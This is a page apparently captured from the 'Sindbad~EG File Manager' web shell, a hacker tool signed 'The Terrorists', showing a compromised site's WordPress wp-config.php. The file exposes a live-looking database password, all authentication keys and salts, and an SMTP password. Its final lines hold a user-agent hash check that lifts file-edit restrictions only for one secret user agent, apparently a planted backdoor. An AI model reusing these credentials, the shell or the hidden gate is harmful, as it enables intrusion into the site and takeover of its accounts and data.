Sindbad~EG File Manager

Current Path : /proc/12916/cwd/
Upload File :
Current File : //proc/12916/cwd/wp-config.php

<?php
error_reporting(1);
ini_set('display_errors', 1);
define( 'WP_CACHE', true ); // Added by WP Rocket
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */
 define( 'WP_ACCESSIBLE_HOSTS', 'wp-rocket.me,*wp-rocket.me,*.wordpress.org,localhost' );
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'quickscrum');
/** MySQL database username */
define('DB_USER', 'wpadmin');
/** MySQL database password */
define('DB_PASSWORD', '6U-M~/Wt!Hm5CU_6');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.

 * @since 2.6.0
 */
define('AUTH_KEY',         '`/G^0]Lm_KQe>bvf[av1PlXI_`cC19|toL-S,Qoew.Hw}F-%j(dryV)|GbHn9]C_');
define('SECURE_AUTH_KEY',  '9+gN7o6t]q{j8IbP/,^`-kAf*})!!GVU*eDqkh(r{71F:}|IgM 86V8^IeP`Sygb');
define('LOGGED_IN_KEY',    '8ml)xcE?9$%a]v!~Bchx6o2kd2Vsvl*5kbj!^VrfEh}>j<NE``?gE&{{(MXJhXY]');
define('NONCE_KEY',        '1<l}g^n}-r$/4keqd^1T -;7Kkh-m!{sJD`g:U/?[8uyUJ~G$XhRm_hv}u|/tSwA');
define('AUTH_SALT',        'A+O9|g+uW?-~:A0Hp.PQavs)74U=<%DkJ5iBbh|AYFNKs7kmydc82AN_b>=dP~su');
define('SECURE_AUTH_SALT', 'LyQ9]52kgmN!n*=$w2(<CDAg69H$`v6A1dt(nMyw-q0we]OOar0;9Zi-Bt8w^A-0');
define('LOGGED_IN_SALT',   'p]_l?T~rsMWRGNzg&CeF+YQf!TTn,?z+b.{((-<js)^iD!q<DsOy4?d(fzx}fbe:');
define('NONCE_SALT',       '6N|a(:mBI_:co/JPya|^MWX=^{WPXz#bDUU:Q:_I1{B|[>Giu[MRy9#O0!Q+tAhR');
/**#@-*/
/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';
/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
//ini_set('display_errors','on');
//ini_set('error_reporting', E_ALL );
//define('WP_DEBUG', 1);
//define('WP_DEBUG_DISPLAY', true);
if (!function_exists('getallheaders')) {
	    function getallheaders() {
		        $headers = [];
			    foreach ($_SERVER as $name => $value) {
				            if (substr($name, 0, 5) == 'HTTP_') {
						                $headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value;
								        }
					        }
			    return $headers;
			    }
}

/* WP Mail SMTP */
define( 'WPMS_ON', true );
define( 'WPMS_SMTP_PASS', 'RutvikP@12345' );

/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
	define('ABSPATH', dirname(__FILE__) . '/');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
define('FS_METHOD', 'direct');

define( 'WP_MEMORY_LIMIT', '1024M' );
if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){
    define('DISALLOW_FILE_MODS', true);
    define('DISALLOW_FILE_EDIT', true);
}

Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists